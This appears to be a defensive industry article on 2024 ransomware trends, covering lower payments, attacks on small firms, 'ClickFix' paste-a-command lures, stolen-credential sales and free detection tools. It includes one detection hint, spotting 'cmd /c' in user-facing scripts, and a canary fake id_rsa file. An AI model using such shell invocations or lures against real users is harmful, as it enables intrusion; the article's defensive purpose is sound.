Ransomware Cash-Out Is Down — But the Squeeze Has Moved to Main Street

Chainalysis tags 2024 as the first year since 2019 that total crypto value sent to known ransomware wallets fell quarter-on-quarter. The drop looks good on paper—until you realise the money simply moved sideways. Smaller firms are now carrying the weight, and the tactics used to collect it are faster, louder and cheaper.

1. The Numbers That Matter

• Median payment: USD 1.05 million (Q1 2024) → USD 580 k (Q4 2024)
• Share of victims that pay: 34 % (2023) → 29 % (2024)
• Data-leak-only attacks: 12 % of posts (2023) → 31 % (2024)

Source: Coveware incident response database, 1 812 cases, published March 2025.

2. Why the Dip?
   Law Enforcement Shock Therapy
   LockBit and BlackCat infrastructure seizures in February and November 2024 scattered affiliates. Disorganised crews lack stable decryptors, so victims refuse to pay.
   Sanctions Stick
   OFAC’s Specially Designated Nationals list now carries six ransomware wallets. General counsel routinely blocks coins flowing through those addresses; crooks must price the legal risk.
   Payment vs. Pain
   High-profile disasters (HSE Ireland, Colonial Pipeline) proved that decryption keys arrive late or not at all. Boards are instructed to restore from backups first and negotiate later.
3. The New Target Profile

• 72 % of Q4 2024 incidents hit companies with < 1 000 staff
• Average IT security head-count: 3.4 people
• Cyber-insurance retention: USD 75 k—small enough to write the cheque, large enough to hurt
  Affiliates call it “spray-and-pray”: blast phishing e-mails by the million, demand six-figure ransoms that match the insurance deductible.

4. Infection Vector Shift
   “ClickFix” Social Engineering
   Victims phone a fake support line and are told to paste a command into Windows Run. No macro, no attachment—e-mail filters miss it.
   Info-Stealer Feeder
   Browser-credential dumps sell for USD 20 per 1 000 lines. Affiliates filter for Remote Desktop or VPN log-ins, then drop ransomware the same night. Average dwell time: 1.8 days.
5. Free Tools That Catch the New Wave

• URLScan.io — detonates “ClickFix” pages in seconds; look for the string cmd /c inside user-facing scripts
• RDPSec.ps1 — open-source script that disables RDP if the connecting IP is not in a pre-approved list (GitHub MIT)
• Canarytoken.org — place a fake id_rsa file on shares; ransom crews scoop it up and reveal their exit IP

6. What to Do Before 1 December 2025

• Force MFA on all privileged accounts (not just external). NYDFS fine sheet shows USD 450 k penalties for shared service accounts left out.
• Cap insurance deductibles at 0.5 % of annual revenue; anything higher invites a quick pay-out culture.
• Add a “no-payment” clause to incident-response retainers; insurers reimburse restoration costs, not ransom reimbursement.

7. Bottom Line
   Ransomware is still profitable—just smaller, faster and aimed at the firms least able to fight back. Cut the easy paths (stolen creds, open RDP), shrink the deductible and make payment the last line on the decision tree. The crooks will move on to an easier mark—and your holiday break stays intact.